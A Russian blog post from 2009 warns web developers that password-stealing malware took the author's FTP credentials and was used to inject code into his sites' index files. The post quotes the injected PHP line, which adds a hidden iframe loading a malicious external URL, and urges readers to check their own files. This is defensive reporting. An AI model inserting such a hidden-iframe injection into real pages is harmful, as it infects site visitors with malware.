Осторожно! Вирус на сайтах.

Автор: Григорий, дата 01/01/2009 17:12
Размещена в «Веб-разработчику»

Пока я был в командировке, я работал на корпоративном лаптопе, на котором говноантивирус по имени Norton Internet Security пропустил какую-то заразу, ворующую пароли от FTP.  

В итоге, на двух своих хостинга заполучил вирусы. Это происходит следующим образом: пароль крадется в момент коннекта к FTP серверу и отсылается куда-то «наружу», с удаленного сервака раз в неделю осуществляется коннект на FTP с украденными данными и все index.* файлы заражаются.

Сигнатура, которая вставляется в индексные файлы, следующая:

<?php echo ‘<div style=»visibility:hidden»><iframe src=»http://directlinkq.cn/in.cgi?27» width=100 height=80></iframe></div>’; ?>

В итоге на сайте позникает невидимый фрейм, в который грузится какая-то зараза и заражает другие компы. Вот такая беда.

Проверьте свои индексные файлы на предмет подобных иньекций.

Ваши комментарии:

также вы можете зарегистрироваться
Подпишитесь на новые записи моего блога:
Добавить в закладки: (в том числе и в Twitter)
Теги: , ,
Дата публикации 01/01/2009 в 17:12 и размещена в Веб-разработчику.

Следить за ответами на сообщение можно в потоке RSS 2.0. Вы можете перейти вниз страницы и оставить свой комментарий.

Читайте также:

  • «Продажные» ссылки на страже сайта
  • Улыбаемся и машем…или как у меня украли деньги с Webmoney
  • Про релиз QPLBoard 4.5 и отстрел варезников…
  • Dr. Web или Касперский – что лучше?
  • Талантливый мистер РИПли или зачем покупать выделенный сервак
    • © 2008-2011 Greg [mnemonic] Zemskov.
    Все записи являются интеллектуальной собственностью автора блога, использование материала в коммерческих целях запрещено.